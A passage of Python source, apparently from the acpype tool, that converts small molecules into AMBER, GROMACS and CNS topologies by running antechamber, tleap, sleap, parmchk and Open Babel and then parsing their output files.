dat1[dHeads[kk]].remove(line) rev = dat2[kk][parEntry][:] rev.reverse() if idFirst is None: idFirst = 0 for ll in rev: if dHeads[kk] in [0, 1, 7]: # MASS has title in index 0 and so BOND, NONB dat1[dHeads[kk]].insert(idFirst + 1, ll) else: dat1[dHeads[kk]].insert(idFirst, ll) dat1[0][0] = mdat[0] for kk in dat1: for line in dat1[kk]: mdatFile.write(line + "\n") return mname dat2 = splitBlock(open(fdat2).readlines()) for kk in list(dat1)[:8]: if kk == 0: lines = dat1[kk][1:-1] + dat2[kk][1:-1] + [""] for line in lines: mdat.append(line) if kk == 1: for i in dat1[kk]: if "-" in i: id1 = dat1[kk].index(i) break for j in dat2[kk]: if "-" in j: id2 = dat2[kk].index(j) break l1 = dat1[kk][:id1] l2 = dat2[kk][:id2] line = "" for item in l1 + l2: line += item.strip() + " " mdat.append(line) lines = dat1[kk][id1:-1] + dat2[kk][id2:-1] + [""] for line in lines: mdat.append(line) if kk in [2, 3, 4, 5, 6]: # angles, p dih, imp dih lines = dat1[kk][:-1] + dat2[kk][:-1] + [""] for line in lines: mdat.append(line) if kk == 7: lines = dat1[kk][:-1] + dat2[kk][1:-1] + [""] for line in lines: mdat.append(line) for kk in list(dat1)[8:]: for line in dat1[kk]: mdat.append(line) for kk in list(dat2)[9:]: for line in dat2[kk]: mdat.append(line) for line in mdat: mdatFile.write(line + "\n") mdatFile.close() return mname def job_pids_family(jpid): """INTERNAL: Return all job processes (PIDs)""" apid = repr(jpid) dict_pids = {} pids = [apid] cmd = "ps -A -o uid,pid,ppid|grep %i" % os.getuid() out = _getoutput(cmd).split("\n") # getoutput("ps -A -o uid,pid,ppid|grep %i" % os.getuid()).split('\n') for item in out: vec = item.split() dict_pids[vec[2]] = vec[1] while True: try: apid = dict_pids[apid] pids.append(apid) except KeyError: break return " ".join(pids) def _getoutput(cmd): """to simulate commands.getoutput in order to work with python 2.6 up to 3.x""" out = sub.Popen(cmd, shell=True, stderr=sub.STDOUT, stdout=sub.PIPE).communicate()[0][:-1] try: o = str(out.decode()) except Exception: o = str(out) return o def while_replace(string): while " " in string: string = string.replace(" ", " ") return string class Topology_14: """ Amber topology abstraction for non-uniform 1-4 scale factors """ def __init__(self) -> None: self.pointers = array.array("d") self.charge = array.array("d") self.atom_type_index = array.array("d") self.nonbonded_parm_index = array.array("d") self.scee_scale_factor = array.array("d") self.scnb_scale_factor = array.array("d") self.dihedral_force_constants = array.array("d") self.dihedral_periodicity = array.array("d") self.dihedral_phase = array.array("d") self.dihedral_yes_H = array.array("d") self.dihedral_no_H = array.array("d") self.lennard_jones_acoef = array.array("d") self.lennard_jones_bcoef = array.array("d") def read_amber_topology(self, buff): """Read AMBER topology file""" flag_strings = [ "%FLAG POINTERS", "%FLAG CHARGE", "%FLAG ATOM_TYPE_INDEX", "%FLAG NONBONDED_PARM_INDEX", "%FLAG SCEE_SCALE_FACTOR", "%FLAG SCNB_SCALE_FACTOR", "%FLAG DIHEDRAL_FORCE_CONSTANT", "%FLAG DIHEDRAL_PERIODICITY", "%FLAG DIHEDRAL_PHASE", "%FLAG DIHEDRALS_INC_HYDROGEN", "%FLAG DIHEDRALS_WITHOUT_HYDROGEN", "%FLAG LENNARD_JONES_ACOEF", "%FLAG LENNARD_JONES_BCOEF", ] attributes = [ "pointers", "charge", "atom_type_index", "nonbonded_parm_index", "scee_scale_factor", "scnb_scale_factor", "dihedral_force_constants", "dihedral_periodicity", "dihedral_phase", "dihedral_yes_H", "dihedral_no_H", "lennard_jones_acoef", "lennard_jones_bcoef", ] for i, _item in enumerate(attributes): try: setattr(self, attributes[i], self.p7_array_read(buff, flag_strings[i])) except Exception: print("Skipping non-existent attributes", attributes[i], flag_strings[i]) @staticmethod def skipline(buff, index): """skip line""" while buff[index] != "\n": index += 1 index += 1 return index def p7_array_read(self, buff, flag_string): """Convert AMBER topology data to python array""" myarray = array.array("d") i = buff.index(flag_string) i = self.skipline(buff, i) i = self.skipline(buff, i) while 1: while buff[i] == " " or buff[i] == "\t" or buff[i] == "\n": i += 1 j = i if buff[i] == "%": break while buff[i] != " " and buff[i] != "\t" and buff[i] != "\n": i += 1 myarray.append(float(buff[j:i])) return myarray def print_gmx_pairs(self): """Generate non-bonded pairs list""" pair_list = [] pair_buff = "[ pairs_nb ]\n; ai aj funct qi qj sigma epsilon\n" pair_list.append(pair_buff) dihedrals = self.dihedral_yes_H + self.dihedral_no_H dih_number = len(dihedrals) j = int(0) while j < dih_number: if dihedrals[j + 2] > 0: parm_idx = int(dihedrals[j + 4]) - 1 scee_scale_factor = self.scee_scale_factor[parm_idx] if scee_scale_factor == 0: scee_scale_factor = 1.2 ai = int(abs(dihedrals[j]) / 3) al = int(abs(dihedrals[j + 3]) / 3) qi = self.charge[ai] / qConv ql = self.charge[al] / qConv / scee_scale_factor ntypes = int(self.pointers[1]) ai_index = int(self.atom_type_index[ai]) al_index = int(self.atom_type_index[al]) nb_parm_index = int(self.nonbonded_parm_index[ntypes * (ai_index - 1) + al_index - 1]) - 1 scnb_scale_factor = self.scnb_scale_factor[parm_idx] if scnb_scale_factor == 0: scnb_scale_factor = 2 lj_acoeff = self.lennard_jones_acoef[nb_parm_index] / scnb_scale_factor lj_bcoeff = self.lennard_jones_bcoef[nb_parm_index] / scnb_scale_factor if lj_bcoeff != 0: sigma6 = lj_acoeff / lj_bcoeff else: sigma6 = 1 # arbitrary and doesnt matter epsilon = lj_bcoeff / 4 / sigma6 * 4.184 sigma = sigma6 ** (1 / 6) / 10 pair_buff = ( "{:>10.0f} {:>10.0f} {:>6.0f} ".format(ai + 1, al + 1, 1) + "{:>10.6f} {:>10.6f} ".format(qi, ql) + "{:>15.5e} {:>15.5e}\n".format(sigma, epsilon) ) pair_list.append(pair_buff) j += 5 return "".join(pair_list) def hasNondefault14(self): """Check non-uniform 1-4 scale factor""" for val in self.scee_scale_factor: if val not in (0, 1.2): return True for val in self.scnb_scale_factor: if val not in (0, 2): return True return False def patch_gmx_topol14(self, gmx_init_top): """Patch GMX topology file for non-uniform 1-4 scale factor""" pair_buff = self.print_gmx_pairs() jdefault = gmx_init_top.index("\n[ atomtypes ]") ipair = gmx_init_top.index("[ pairs ]") jpair = gmx_init_top.index("\n[ angles ]") init_buff = ( "\n\n[ defaults ]\n" + "; nbfunc comb-rule gen-pairs \n" + "1 2 no \n" ) return ( gmx_init_top.splitlines()[0] + init_buff + gmx_init_top[jdefault:ipair] + pair_buff + gmx_init_top[jpair : len(gmx_init_top)] ) class AbstractTopol: """ Super class to build topologies """ __metaclass__ = abc.ABCMeta @abc.abstractmethod def __init__(self): if self.__class__ is AbstractTopol: raise TypeError("Attempt to create istance of abstract class AbstractTopol") self.debug = None self.verbose = None self.chargeVal = None self.tmpDir = None self.absInputFile = None self.chargeType = None self.babelExe = None self.baseName = None self.acExe = None self.force = None self.acBaseName = None self.atomType = None self.acMol2FileName = None self.multiplicity = None self.qFlag = None self.ekFlag = None self.timeTol = None self.acXyzFileName = None self.acTopFileName = None self.sleapExe = None self.acParDict = None self.tleapExe = None self.parmchkExe = None self.acFrcmodFileName = None self.gaffDatfile = None self.homeDir = None self.rootDir = None self.extOld = None self.engine = None self.direct = None self.disam = None self.gmx4 = None self.sorted = None self.chiral = None self.outTopols = None self.ext = None self.xyzFileData = None self.obchiralExe = None self.charmmBase = None self.allhdg = None self.topo14Data = None self.atomPairs = None self.properDihedralsGmx45 = None self.properDihedralsAlphaGamma = None self.properDihedralsCoefRB = None self.resName = None self.acLog = None self.sleapLog = None self.tleapLog = None self.parmchkLog = None self.inputFile = None self.babelLog = None self.absHomeDir = None self.molTopol = None self.topFileData = None self.residueLabel = None self._atomTypeNameList = None self.atomTypeSystem = None self.totalCharge = None self.atoms = None self.atomTypes = None self.pbc = None self.bonds = None self.angles = None self.properDihedrals = None self.improperDihedrals = None self.condensedProperDihedrals = None self.chiralGroups = None self.excludedAtoms = None self.atomsGromacs = None self.atomTypesGromacs = None self.CnsTopFileName = None self.CnsInpFileName = None self.CnsParFileName = None self.CnsPdbFileName = None def printDebug(self, text=""): """Debug log level""" if self.debug: print("DEBUG: %s" % while_replace(text)) def printWarn(self, text=""): """Warn log level""" if self.verbose: print("WARNING: %s" % while_replace(text)) def printError(self, text=""): """Error log level""" if self.verbose: print("ERROR: %s" % while_replace(text)) def printMess(self, text=""): """Info log level""" if self.verbose: print("==> %s" % while_replace(text)) def printQuoted(self, text=""): """Print quoted messages""" if self.verbose: print(10 * "+" + "start_quote" + 59 * "+") print(while_replace(text)) print(10 * "+" + "end_quote" + 61 * "+") def guessCharge(self): """ Guess the charge of a system based on antechamber Returns None in case of error """ done = False error = False charge = self.chargeVal localDir = os.path.abspath(".") if not os.path.exists(self.tmpDir): os.mkdir(self.tmpDir) if not os.path.exists(os.path.join(self.tmpDir, self.inputFile)): copy2(self.absInputFile, self.tmpDir) os.chdir(self.tmpDir) if self.chargeType == "user": if self.ext == ".mol2": self.printMess("Reading user's charges from mol2 file...") charge = self.readMol2TotalCharge(self.inputFile) done = True else: self.printWarn("cannot read charges from a PDB file") self.printWarn("using now 'bcc' method for charge") if self.chargeVal is None and not done: self.printWarn("no charge value given, trying to guess one...") mol2FileForGuessCharge = self.inputFile if self.ext == ".pdb": cmd = "%s -ipdb %s -omol2 -O %s.mol2" % (self.babelExe, self.inputFile, self.baseName) self.printDebug("guessCharge: " + cmd) out = _getoutput(cmd) self.printDebug(out) mol2FileForGuessCharge = os.path.abspath(self.baseName + ".mol2") in_mol = "mol2" else: in_mol = self.ext[1:] if in_mol == "mol": in_mol = "mdl" cmd = "%s -dr no -i %s -fi %s -o tmp -fo mol2 -c gas -pf y" % (self.acExe, mol2FileForGuessCharge, in_mol) if self.debug: self.printMess("Debugging...") cmd = cmd.replace("-pf y", "-pf n") print(while_replace(cmd)) log = _getoutput(cmd).strip() if os.path.exists("tmp"): charge = self.readMol2TotalCharge("tmp") else: try: charge = float( log.strip() .split("equal to the total charge (")[-1] .split(") based on Gasteiger atom type, exit")[0] ) except Exception: error = True if error: self.printError("guessCharge failed") os.chdir(localDir) self.printQuoted(log) self.printMess("Trying with net charge = 0 ...") # self.chargeVal = 0 charge = float(charge) charge2 = int(round(charge)) drift = abs(charge2 - charge) self.printDebug("Net charge drift '%3.6f'" % drift) if drift > diffTol: self.printError("Net charge drift '%3.5f' bigger than tolerance '%3.5f'" % (drift, diffTol)) if not self.force: sys.exit(7) self.chargeVal = str(charge2) self.printMess("... charge set to %i" % charge2) os.chdir(localDir) def setResNameCheckCoords(self): """Set a 3 letter residue name and check coords duplication """ exit_ = False localDir = os.path.abspath(".") if not os.path.exists(self.tmpDir): os.mkdir(self.tmpDir) # if not os.path.exists(os.path.join(tmpDir, self.inputFile)): copy2(self.absInputFile, self.tmpDir) os.chdir(self.tmpDir) exten = self.ext[1:] if self.ext == ".pdb": tmpFile = open(self.inputFile, "r") else: if exten == "mol": exten = "mdl" cmd = "%s -dr no -i %s -fi %s -o tmp -fo ac -pf y" % (self.acExe, self.inputFile, exten) self.printDebug(cmd) out = _getoutput(cmd) if not out.isspace(): self.printDebug(out) try: tmpFile = open("tmp", "r") except Exception: rmtree(self.tmpDir) raise tmpData = tmpFile.readlines() residues = set() coords = {} for line in tmpData: if "ATOM " in line or "HETATM" in line: residues.add(line[17:20]) at = line[0:17] cs = line[30:54] if cs in coords: coords[cs].append(at) else: coords[cs] = [at] # self.printDebug(coords) if len(residues) > 1: self.printError("more than one residue detected '%s'" % str(residues)) self.printError("verify your input file '%s'. Aborting ..." % self.inputFile) sys.exit(9) dups = "" shortd = "" longd = "" longSet = set() id_ = 0 items = list(coords.items()) ll = len(items) for item in items: id_ += 1 if len(item[1]) > 1: # if True means atoms with same coordinates for i in item[1]: dups += "%s %s\n" % (i, item[0]) # for i in xrange(0,len(data),f): # fdata += (data[i:i+f])+' ' for id2 in range(id_, ll): item2 = items[id2] c1 = list(map(float, [item[0][i : i + 8] for i in range(0, 24, 8)])) c2 = list(map(float, [item2[0][i : i + 8] for i in range(0, 24, 8)])) dist2 = distanceAA(c1, c2) if dist2 < minDist2: dist = math.sqrt(dist2) shortd += "%8.5f %s %s\n" % (dist, item[1], item2[1]) if dist2 < maxDist2: # and not longOK: longSet.add(str(item[1])) longSet.add(str(item2[1])) if str(item[1]) not in longSet and ll > 1: longd += "%s\n" % item[1] if dups: self.printError("Atoms with same coordinates in '%s'!" % self.inputFile) self.printQuoted(dups[:-1]) exit_ = True if shortd: self.printError("Atoms TOO close (< %s Ang.)" % minDist) self.printQuoted("Dist (Ang.) Atoms\n" + shortd[:-1]) exit_ = True if longd: self.printError("Atoms TOO alone (> %s Ang.)" % maxDist) self.printQuoted(longd[:-1]) exit_ = True if exit_: if self.force: self.printWarn("You chose to proceed anyway with '-f' option. GOOD LUCK!") else: self.printError("Use '-f' option if you want to proceed anyway. Aborting ...") rmtree(self.tmpDir) sys.exit(11) resname = list(residues)[0].strip() newresname = resname # To avoid resname likes: 001 (all numbers), 1e2 (sci number), ADD : reserved terms for leap leapWords = [ "_cmd_options_", "_types_", "add", "addAtomTypes", "addIons", "addIons2", "addPath", "addPdbAtomMap", "addPdbResMap", "alias", "alignAxes", "bond", "bondByDistance", "center", "charge", "check", "clearPdbAtomMap", "clearPdbResMap", "clearVariables", "combine", "copy", "createAtom", "createParmset", "createResidue", "createUnit", "crossLink", "debugOff", "debugOn", "debugStatus", "deleteBond", "deleteOffLibEntry", "deleteRestraint", "desc", "deSelect", "displayPdbAtomMap", "displayPdbResMap", "edit", "flip", "groupSelectedAtoms", "help", "impose", "list", "listOff", "loadAmberParams", "loadAmberPrep", "loadMol2", "loadOff", "loadPdb", "loadPdbUsingSeq", "logFile", "matchVariables", "measureGeom", "quit", "relax", "remove", "restrainAngle", "restrainBond", "restrainTorsion", "saveAmberParm", "saveAmberParmPert", "saveAmberParmPol", "saveAmberParmPolPert", "saveAmberPrep", "saveMol2", "saveOff", "saveOffParm", "savePdb", "scaleCharges", "select", "sequence", "set", "setBox", "solvateBox", "solvateCap", "solvateDontClip", "solvateOct", "solvateShell", "source", "transform", "translate", "verbosity", "zMatrix", ] isLeapWord = False for word in leapWords: if resname.upper().startswith(word.upper()): self.printDebug("Residue name is a reserved word: '%s'" % word.upper()) isLeapWord = True try: float(resname) self.printDebug("Residue name is a 'number': '%s'" % resname) isNumber = True except ValueError: isNumber = False if resname[0].isdigit() or isNumber or isLeapWord: newresname = "R" + resname if not resname.isalnum(): newresname = "MOL" if newresname != resname: self.printWarn( "In %s.lib, residue name will be '%s' instead of '%s' elsewhere" % (self.acBaseName, newresname, resname) ) self.resName = newresname os.chdir(localDir) self.printDebug("setResNameCheckCoords done") def readMol2TotalCharge(self, mol2File): """Reads the charges in given mol2 file and returns the total """ charge = 0.0 ll = [] cmd = "%s -dr no -i %s -fi mol2 -o tmp -fo mol2 -c wc -cf tmp.crg -pf y" % (self.acExe, mol2File) if self.debug: self.printMess("Debugging...") cmd = cmd.replace("-pf y", "-pf n") self.printDebug(cmd) log = _getoutput(cmd) if os.path.exists("tmp.crg"): tmpFile = open("tmp.crg", "r") tmpData = tmpFile.readlines() for line in tmpData: ll += line.split() charge = sum(map(float, ll)) if not log.isspace() and self.debug: self.printQuoted(log) self.printDebug("readMol2TotalCharge: " + str(charge)) return charge def execAntechamber(self, chargeType=None, atomType=None): """To call Antechamber and execute it Welcome to antechamber 17.3: molecular input file processor. Usage: antechamber -i input file name -fi input file format -o output file name -fo output file format -c charge method -cf charge file name -nc net molecular charge (int) -a additional file name -fa additional file format -ao additional file operation crd : only read in coordinate crg : only read in charge radius: only read in radius name : only read in atom name type : only read in atom type bond : only read in bond type -m multiplicity (2S+1), default is 1 -rn residue name, overrides input file, default is MOL -rf residue toplogy file name in prep input file, default is molecule.res -ch check file name for gaussian, default is 'molecule' -ek mopac or sqm keyword, inside quotes; overwrites previous ones -gk gaussian job keyword, inside quotes -gm gaussian memory keyword, inside quotes, such as "%mem=1000MB" -gn gaussian number of processors keyword, inside quotes, such as "%nproc=8" -gv add keyword to generate gesp file (for Gaussian 09 only) 1 : yes 0 : no, the default -ge gaussian esp file generated by iop(6/50=1), default is g09.gesp -df am1-bcc precharge flag, 2 - use sqm(default); 0 - use mopac -at atom type gaff : the default gaff2: for gaff2 (beta-version) amber: for PARM94/99/99SB bcc : bcc sybyl: sybyl -du fix duplicate atom names: yes(y)[default] or no(n) -bk component/block Id, for ccif -an adjust atom names: yes(y) or no(n) the default is 'y' for 'mol2' and 'ac' and 'n' for the other formats -j atom type and bond type prediction index, default is 4 0 : no assignment 1 : atom type 2 : full bond types 3 : part bond types 4 : atom and full bond type 5 : atom and part bond type -s status information: 0(brief), 1(default) or 2(verbose) -eq equalizing atomic charge, default is 1 for '-c resp' and '-c bcc' and 0 for the other chrg mthds 0 : no use 1 : by atomic paths 2 : by atomic paths and structural information, i.e. E/Z configurations -pf remove intermediate files: yes(y) or no(n)[default] -pl maximum path length to determin equivalence of atomic charges for resp and bcc, the smaller the value, the faster the algorithm, default is -1 (use full length), set this parameter to 10 to 30 if your molecule is big (# atoms >= 100) -dr acdoctor mode: yes(y)[default] or no(n) -i -o -fi and -fo must appear; others are optional Use 'antechamber -L' to list the supported file formats and charge methods List of the File Formats file format type abbre. index | file format type abbre. index -------------------------------------------------------------- Antechamber ac 1 | Sybyl Mol2 mol2 2 PDB pdb 3 | Modified PDB mpdb 4 AMBER PREP (int) prepi 5 | AMBER PREP (car) prepc 6 Gaussian Z-Matrix gzmat 7 | Gaussian Cartesian gcrt 8 Mopac Internal mopint 9 | Mopac Cartesian mopcrt 10 Gaussian Output gout 11 | Mopac Output mopout 12 Alchemy alc 13 | CSD csd 14 MDL mdl 15 | Hyper hin 16 AMBER Restart rst 17 | Jaguar Cartesian jcrt 18 Jaguar Z-Matrix jzmat 19 | Jaguar Output jout 20 Divcon Input divcrt 21 | Divcon Output divout 22 SQM Input sqmcrt 23 | SQM Output sqmout 24 Charmm charmm 25 | Gaussian ESP gesp 26 Component cif ccif 27 | -------------------------------------------------------------- AMBER restart file can only be read in as additional file. List of the Charge Methods charge method abbre. index | charge method abbre. index -------------------------------------------------------------- RESP resp 1 | AM1-BCC bcc 2 CM1 cm1 3 | CM2 cm2 4 ESP (Kollman) esp 5 | Mulliken mul 6 Gasteiger gas 7 | Read in charge rc 8 Write out charge wc 9 | Delete Charge dc 10 -------------------------------------------------------------- """ global pid self.printMess("Executing Antechamber...") self.makeDir() ct = chargeType or self.chargeType at = atomType or self.atomType if "amber2" in at: at = "amber" if ct == "user": ct = "" else: ct = "-c %s" % ct exten = self.ext[1:] if exten == "mol": exten = "mdl" cmd = "%s -dr no -i %s -fi %s -o %s -fo mol2 %s -nc %s -m %s -s 2 -df %s -at %s -pf y %s" % ( self.acExe, self.inputFile, exten, self.acMol2FileName, ct, self.chargeVal, self.multiplicity, self.qFlag, at, self.ekFlag, ) if self.debug: self.printMess("Debugging...") cmd = cmd.replace("-pf y", "-pf n") self.printDebug(cmd) if os.path.exists(self.acMol2FileName) and not self.force: self.printMess("AC output file present... doing nothing") else: try: os.remove(self.acMol2FileName) except Exception: pass signal.signal(signal.SIGALRM, self.signal_handler) signal.alarm(self.timeTol) p = sub.Popen(cmd, shell=True, stderr=sub.STDOUT, stdout=sub.PIPE) pid = p.pid out = str(p.communicate()[0].decode()) # p.stdout.read() self.acLog = out if os.path.exists(self.acMol2FileName): self.printMess("* Antechamber OK *") else: self.printQuoted(self.acLog) return True return False def signal_handler(self, _signum, _frame): # , pid = 0): """Signal handler""" global pid pids = job_pids_family(pid) self.printDebug("PID: %s, PIDS: %s" % (pid, pids)) self.printMess("Timed out! Process %s killed, max exec time (%ss) exceeded" % (pids, self.timeTol)) # os.system('kill -15 %s' % pids) for i in pids.split(): os.kill(int(i), 15) raise Exception("Semi-QM taking too long to finish... aborting!") def delOutputFiles(self): """Delete temporary output files""" delFiles = [ "mopac.in", "tleap.in", "sleap.in", "fixbo.log", "addhs.log", "ac_tmp_ot.mol2", "frcmod.ac_tmp", "fragment.mol2", self.tmpDir, ] # , 'divcon.pdb', 'mopac.pdb', 'mopac.out'] #'leap.log' self.printMess("Removing temporary files...") for file_ in delFiles: file_ = os.path.join(self.absHomeDir, file_) if os.path.exists(file_): if os.path.isdir(file_): rmtree(file_) else: os.remove(file_) def checkXyzAndTopFiles(self): """Cehck XYZ and TOP files""" fileXyz = self.acXyzFileName fileTop = self.acTopFileName if os.path.exists(fileXyz) and os.path.exists(fileTop): # self.acXyz = fileXyz # self.acTop = fileTop return True return False def execSleap(self): """Execute sleap""" global pid self.makeDir() if self.ext == ".mol2": self.printWarn("Sleap doesn't work with mol2 files yet...") return True if self.chargeType != "bcc": self.printWarn("Sleap works only with bcc charge method") return True if self.atomType != "gaff": self.printWarn("Sleap works only with gaff atom type") return True sleapScpt = SLEAP_TEMPLATE % self.acParDict fp = open("sleap.in", "w") fp.write(sleapScpt) fp.close() cmd = "%s -f sleap.in" % self.sleapExe if self.checkXyzAndTopFiles() and not self.force: self.printMess("Topologies files already present... doing nothing") else: try: os.remove(self.acTopFileName) os.remove(self.acXyzFileName) except Exception: pass self.printMess("Executing Sleap...") self.printDebug(cmd) p = sub.Popen(cmd, shell=True, stderr=sub.STDOUT, stdout=sub.PIPE) pid = p.pid signal.signal(signal.SIGALRM, self.signal_handler) signal.alarm(self.timeTol) out = str(p.communicate()[0].decode()) # p.stdout.read() self.sleapLog = out self.checkLeapLog(self.sleapLog) if self.checkXyzAndTopFiles(): self.printMess(" * Sleap OK *") else: self.printQuoted(self.sleapLog) return True return False def execTleap(self): """Execute tleap""" fail = False self.makeDir() if self.ext == ".pdb": self.printMess("... converting pdb input file to mol2 input file") if self.convertPdbToMol2(): self.printError("convertPdbToMol2 failed") # print self.chargeVal if self.execAntechamber(): self.printError("Antechamber failed") fail = True if self.execParmchk(): self.printError("Parmchk failed") fail = True if fail: return True tleapScpt = TLEAP_TEMPLATE % self.acParDict fp = open("tleap.in", "w") fp.write(tleapScpt) fp.close() cmd = "%s -f tleap.in" % self.tleapExe if self.checkXyzAndTopFiles() and not self.force: self.printMess("Topologies files already present... doing nothing") else: try: os.remove(self.acTopFileName) os.remove(self.acXyzFileName) except Exception: pass self.printMess("Executing Tleap...") self.printDebug(cmd) self.tleapLog = _getoutput(cmd) self.checkLeapLog(self.tleapLog) if self.checkXyzAndTopFiles(): self.printMess("* Tleap OK *") else: self.printQuoted(self.tleapLog) return True return False def checkLeapLog(self, log): """Check Leap log""" log = log.splitlines(True) check = "" block = False for line in log: # print "*"+line+"*" if "Checking '" in line: # check += line block = True if "Checking Unit." in line: block = False if block: check += line self.printQuoted(check[:-1]) def locateDat(self, aFile): """locate a file pertinent to $AMBERHOME/dat/leap/parm/""" amberhome = os.environ.get("AMBERHOME") if amberhome: aFileF = os.path.join(amberhome, "dat/leap/parm", aFile) if os.path.exists(aFileF): return aFileF aFileF = os.path.join(os.path.dirname(self.acExe), "../dat/leap/parm", aFile) if os.path.exists(aFileF): return aFileF return None def execParmchk(self): """Execute parmchk""" self.makeDir() cmd = "%s -i %s -f mol2 -o %s" % (self.parmchkExe, self.acMol2FileName, self.acFrcmodFileName) if "amber" in self.atomType: gaffFile = self.locateDat(self.gaffDatfile) parmfile = self.locateDat("parm10.dat") frcmodffxxSB = self.locateDat("frcmod.ff14SB") # frcmodparmbsc0 = self.locateDat('frcmod.parmbsc0') parmGaffFile = parmMerge(parmfile, gaffFile) parmGaffffxxSBFile = parmMerge(parmGaffFile, frcmodffxxSB, frcmod=True) # parm99gaffff99SBparmbsc0File = parmMerge(parm99gaffff99SBFile, frcmodparmbsc0, frcmod = True) # parm10file = self.locateDat('parm10.dat') # PARM99 + frcmod.ff99SB + frcmod.parmbsc0 in AmberTools 1.4 cmd += " -p %s" % parmGaffffxxSBFile # Ignoring BSC0 elif "gaff2" in self.atomType: cmd += " -s 2" self.parmchkLog = _getoutput(cmd) self.printDebug(cmd) if os.path.exists(self.acFrcmodFileName): check = self.checkFrcmod() if check: self.printWarn("Couldn't determine all parameters:") self.printMess("From file '%s'\n" % self.acFrcmodFileName + check) else: self.printMess("* Parmchk OK *") else: self.printQuoted(self.parmchkLog) return True return False def checkFrcmod(self): """Check FRCMOD file""" check = "" frcmodContent = open(self.acFrcmodFileName, "r").readlines() for line in frcmodContent: if "ATTN, need revision" in line: check += line return check def convertPdbToMol2(self): """Convert PDB to MOL2 by using babel""" if self.ext == ".pdb": if self.execBabel(): self.printError("convert pdb to mol2 via babel failed") return True return False def execBabel(self): """Execute babel""" self.makeDir() cmd = "%s -ipdb %s -omol2 -O %s.mol2" % (self.babelExe, self.inputFile, self.baseName) self.printDebug(cmd) self.babelLog = _getoutput(cmd) self.ext = ".mol2" self.inputFile = self.baseName + self.ext self.acParDict["ext"] = "mol2" if os.path.exists(self.inputFile): self.printMess("* Babel OK *") else: self.printQuoted(self.babelLog) return True return False def makeDir(self): """Make Dir""" os.chdir(self.rootDir) self.absHomeDir = os.path.abspath(self.homeDir) if not os.path.exists(self.homeDir): os.mkdir(self.homeDir) os.chdir(self.homeDir) copy2(self.absInputFile, ".") return True def createACTopol(self): """ If successful, Amber Top and Xyz files will be generated """ # sleap = False if self.engine == "sleap": if self.execSleap(): self.printError("Sleap failed") self.printMess("... trying Tleap") if self.execTleap(): self.printError("Tleap failed") if self.engine == "tleap": if self.execTleap(): self.printError("Tleap failed") if self.extOld == ".pdb": self.printMess("... trying Sleap") self.ext = self.extOld self.inputFile = self.baseName + self.ext if self.execSleap(): self.printError("Sleap failed") if not self.debug: self.delOutputFiles() def createMolTopol(self): """ Create molTop obj """ self.topFileData = open(self.acTopFileName, "r").readlines() self.molTopol = MolTopol( self, verbose=self.verbose, debug=self.debug, gmx4=self.gmx4, disam=self.disam, direct=self.direct, is_sorted=self.sorted, chiral=self.chiral, ) if self.outTopols: if "cns" in self.outTopols: self.molTopol.writeCnsTopolFiles() if "gmx" in self.outTopols: self.molTopol.writeGromacsTopolFiles() if "charmm" in self.outTopols: self.writeCharmmTopolFiles() self.pickleSave() def pickleSave(self): """ To restore: from acpype import * #import cPickle as pickle import pickle o = pickle.load(open('DDD.pkl','rb')) NB: It fails to restore with ipython in Mac (Linux OK) """ pklFile = self.baseName + ".pkl" dumpFlag = False if not os.path.exists(pklFile): mess = "Writing pickle file %s" % pklFile dumpFlag = True elif self.force: mess = "Overwriting pickle file %s" % pklFile dumpFlag = True else: mess = "Pickle file %s already present... doing nothing" % pklFile self.printMess(mess) if dumpFlag: with open(pklFile, "wb") as f: # for python 3.3 or higher pickle.dump(self, f) def getFlagData(self, flag): """ For a given acFileTop flag, return a list of the data related """ block = False tFlag = "%FLAG " + flag data = "" if not self.topFileData: raise Exception("PRMTOP file empty?") for rawLine in self.topFileData: if "%COMMENT" in rawLine: continue line = rawLine.replace("\r", "").replace("\n", "") if tFlag in line: block = True continue if block and "%FLAG " in line: break if block: if "%FORMAT" in line: line = line.strip().strip("%FORMAT()").split(".")[0] for c in line: if c.isalpha(): f = int(line.split(c)[1]) break continue data += line # data need format sdata = [data[i : i + f].strip() for i in range(0, len(data), f)] if "+" and "." in data and flag != "RESIDUE_LABEL": # it's a float ndata = list(map(float, sdata)) elif flag != "RESIDUE_LABEL": try: # try if it's integer ndata = list(map(int, sdata)) except Exception: ndata = sdata else: ndata = sdata if flag == "AMBER_ATOM_TYPE": nn = [] ll = set() prefixed = False for ii in ndata: prefixed = True if ii[0].isdigit(): ll.add(ii) ii = "A" + ii nn.append(ii) if prefixed and ll: self.printDebug("GMX does not like atomtype starting with Digit") self.printDebug("prefixing AtomType %s with 'A'." % list(ll)) ndata = nn return ndata # a list def getResidueLabel(self): """ Get a 3 capital letters code from acFileTop Returns a list. """ residueLabel = self.getFlagData("RESIDUE_LABEL") residueLabel = list(map(str, residueLabel)) if residueLabel[0] != residueLabel[0].upper(): self.printWarn("residue label '%s' in '%s' is not all UPPERCASE" % (residueLabel[0], self.inputFile)) self.printWarn("this may raise problem with some applications like CNS") self.residueLabel = residueLabel def getCoords(self): """ For a given acFileXyz file, return a list of coords as: [[x1,y1,z1],[x2,y2,z2], etc.] """ if not self.xyzFileData: raise Exception("INPCRD file empty?") data = "" for rawLine in self.xyzFileData[2:]: line = rawLine.replace("\r", "").replace("\n", "") data += line ll = len(data) ndata = list(map(float, [data[i : i + 12] for i in range(0, ll, 12)])) gdata = [] for i in range(0, len(ndata), 3): gdata.append([ndata[i], ndata[i + 1], ndata[i + 2]]) self.printDebug("getCoords done") return gdata def getAtoms(self): """ Set a list with all atoms objects build from dat in acFileTop Set also if molTopol atom type system is gaff or amber Set also list atomTypes Set also resid Set also molTopol total charge """ atomNameList = self.getFlagData("ATOM_NAME") atomTypeNameList = self.getFlagData("AMBER_ATOM_TYPE") self._atomTypeNameList = atomTypeNameList massList = self.getFlagData("MASS") chargeList = self.getFlagData("CHARGE") # totalCharge = sum(chargeList) # self.printDebug('charge to be balanced: total %13.10f' % (totalCharge/qConv)) resIds = self.getFlagData("RESIDUE_POINTER") + [0] # to guess the resId of the last residue before ion or water # for resTemp in self.residueLabel: # if resTemp in ionOrWaterResNameList: # lastSoluteResId = self.residueLabel.index(resTemp) - 1 # break # print lastSoluteResId, self.residueLabel[lastSoluteResId] # uniqAtomTypeId = self.getFlagData('ATOM_TYPE_INDEX') # for LJ # balanceChargeList = self.balanceCharges(chargeList) coords = self.getCoords() ACOEFs, BCOEFs = self.getABCOEFs() atoms = [] atomTypes = [] tmpList = [] # a list with unique atom types totalCharge = 0.0 countRes = 0 id_ = 0 FirstNonSoluteId = None for atomName in atomNameList: if atomName != atomName.upper(): self.printDebug("atom name '%s' HAS to be all UPPERCASE... 